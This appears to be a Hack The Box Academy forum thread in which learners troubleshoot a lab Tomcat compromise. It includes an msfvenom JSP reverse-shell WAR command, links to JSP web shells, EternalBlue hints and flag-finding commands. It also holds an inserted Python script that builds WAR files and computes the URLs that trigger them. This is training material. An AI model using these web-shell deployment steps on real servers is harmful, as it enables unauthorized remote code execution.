[Academy hack the box][Shells & Payloads][The Live Engagement][Lightweight facebook-styled blog 1.3]

You're welcome, bro :slight_smile:

Hey everyone,

I am desperately trying to get the Tomcat WAR file upload going.

I already messaged with two members and got useful insight, but still no shell,
so I'll break it down again.

I know that it is a Windows system and Tomcat is Java.
I got the Tomcat credentials and logged in.
I use msfvenom -p java/jsp_shell_reverse_tcp with LHOST=my_IP LPORT=4444 -f war -o shell.war
I start a listener (netcat or msfconsole exploit/multi/handler).
I upload the payload and click on it in the browser.

Nothing happens.
I tried other payloads as well, but then Tomcat throws errors.
I even wrote my own JSP to print "Hello HTB" with guidance from this link:
HTB{ Jerry } (epi052.gitlab.io)
but nothing …
I thought that maybe I need to put the address 172.16.1.11:8080/shell in /etc/hosts, but no.
I followed this video: Exploiting Apache Tomcat - YouTube
No luck.
I tried to troubleshoot the payload like in this link:
eighty-two - Why an MsfVenom WAR payload might return a 404 (eightytwo.net)
No.

What am I missing? :cold_sweat: :roll_eyes: :exploding_head:

I solved it manually, without Metasploit.

Here you can download a webshell:
https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp

Then put the file into a WAR file.

The hosts file is there to translate domain names into IP addresses.
Entering an IP address without a domain name makes no sense :wink:
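As an added illustration of the two approaches in this thread (the msfvenom WAR from the question and the hand-built WAR from the reply above), and not code from the thread, from HTB or from Metasploit: a small Python script that packs a JSP into a WAR and works out the URL Tomcat will actually run it at. The point it shows is the one behind the eighty-two article: Tomcat deploys shell.war under the context /shell, and a JSP is reachable only at /shell/<jsp-name>.jsp. The msfvenom WAR wrapper gives its JSP a random name and, as far as I have seen, ships a web.xml that maps nothing to the context root, so clicking /shell/ in the manager returns a 404 and the payload never executes; you either request the random .jsp name (list the archive to find it) or name your own JSP index.jsp, which Tomcat's default welcome-file list already picks up. The "Hello HTB" JSP body, the target 172.16.1.11:8080 and the file name shell.war are constructed placeholders.

```python
"""Pack a JSP into a Tomcat WAR and compute the URL Tomcat will serve it at.

Added example for this thread; not HTB's, Metasploit's or a poster's code.
The JSP body, the target host/port and the WAR name are constructed placeholders.
"""
import io
import sys
import zipfile

# Constructed placeholder JSP: prints a marker so the deployment can be verified
# before a real command shell (e.g. cmd.jsp from the link above) is dropped in.
HELLO_JSP = b'<%@ page language="java" %>\n<% out.println("Hello HTB"); %>\n'

# Minimal deployment descriptor. The welcome-file makes /<context>/ run the JSP.
# Tomcat's own conf/web.xml already lists index.jsp as a welcome file, so this
# matters mainly when the JSP has some other name.
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
  <welcome-file-list>
    <welcome-file>{jsp}</welcome-file>
  </welcome-file-list>
</web-app>
"""


def build_war(jsp_source: bytes, jsp_name: str = "index.jsp", welcome: bool = True) -> bytes:
    """Return the bytes of a WAR holding jsp_source at the archive root.

    A WAR is just a zip file; Tomcat compiles any .jsp it finds on first request.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr(jsp_name, jsp_source)
        if welcome:
            war.writestr("WEB-INF/web.xml", WEB_XML.format(jsp=jsp_name))
    return buf.getvalue()


def jsp_entries(war_bytes: bytes) -> list[str]:
    """List the requestable .jsp files in a WAR (anything under WEB-INF/ is never served)."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return sorted(
            name for name in war.namelist()
            if name.lower().endswith(".jsp") and not name.startswith("WEB-INF/")
        )


def trigger_urls(base_url: str, war_filename: str, war_bytes: bytes) -> list[str]:
    """URLs that execute the JSP(s) once war_filename is deployed through the manager.

    Tomcat derives the context path from the file name: shell.war -> /shell.
    """
    context = war_filename.rsplit("/", 1)[-1]
    if context.endswith(".war"):
        context = context[:-4]
    base = base_url.rstrip("/")
    return [f"{base}/{context}/{entry}" for entry in jsp_entries(war_bytes)]


def main(argv: list[str]) -> int:
    out = argv[1] if len(argv) > 1 else "shell.war"
    war = build_war(HELLO_JSP)
    with open(out, "wb") as fh:
        fh.write(war)
    # Constructed target taken from the thread; adjust to the engagement.
    for url in trigger_urls("http://172.16.1.11:8080", out, war):
        print("request this after upload:", url)
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

To check an msfvenom-generated archive instead, read it from disk and pass it to trigger_urls("http://172.16.1.11:8080", "shell.war", data): the single URL it prints is the one to open (with curl or the Burp browser) after the upload, with the listener already running. If that URL returns a Tomcat error page rather than a blank response, the JSP failed to compile and the error text names the line.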

Are you sure you're inputting the correct IP? There should be a few listed; from what you wrote, it looks like you're doing it correctly to me.

Also, just to make sure: you are using the Parrot box that you connect to via NoMachine to set up the listener, correct?

Hey! Thank you for your reply!
I will definitely try this payload. I only thought that, since this Academy module introduced Metasploit and the videos and articles I read used it (with success :smiley:), it should work,
but I will give it a try :slight_smile:

Thanks for the hosts file insight!

Hi,
I got the same error message when using the exploit.
Can you help me out, please?

Hey, would you mind helping me, please? I have been stuck on this for a long time now and have tried too many different things, but nothing is working. Your help will be much appreciated.

Hello :slight_smile: How do you get to use it in Metasploit?! I get an error when I type updatedb after I copied it into the msf4 folder :frowning: :frowning:

How do you get it working in your msfconsole?! My msfconsole can't find that exploit after I have done the whole mkdir/updatedb process.

Some questions about Host-02 (Blog) that I would like to ask:
Do you use the browser "Links 2", which is installed on the foothold machine, to browse the page http://blog.inlanefreight.local:80? Links 2 is too slow for browsing the page and it can't show some elements on the page (e.g. the login button). Do you have another way to browse the page? Thank you.

Hi, the same problem has already broken my head. Can you please tell me what I'm doing wrong? :slight_smile:

Did you ever figure this out? I also can't figure out how people are browsing to these machines on port 8080 or 80 without Firefox on the foothold PC.

Hey mate,
create a WAR file and replace the JSP file with the web shell payload from the given link.
https://raw.githubusercontent.com/tennc/webshell/master/jsp/jsp-reverse.jsp
Hope this helps.
Happy hacking

Hey, can anyone explain how to get the Host-03 file? I got a shell but am unable to fetch the flag; it is asking for administrator privileges.


You can use msfconsole and check if it's vulnerable to EternalBlue!

Solved it already, mate, thanks.

Can someone help me with finding the flag on the blog.inlanefreight.local one? I can get a shell through msfconsole. Do I then have to drop into a system shell? I can't get it to be interactive.

In either Meterpreter or the system shell, I can't find /customscripts/flag.txt for the life of me… Any pointers?

Okay, I figured it out. I don't know why I couldn't find the location of the /customscripts folder. I ended up searching for it using

find / -type f -name flag.txt 2>/dev/null

and then piping the results to cat by setting the find as an env variable.

cat $(find / -type f -name flag.txt 2>/dev/null)

Why is there no browser on my foothold machine?

You can use Burp Suite's browser; that's what I did :smiley: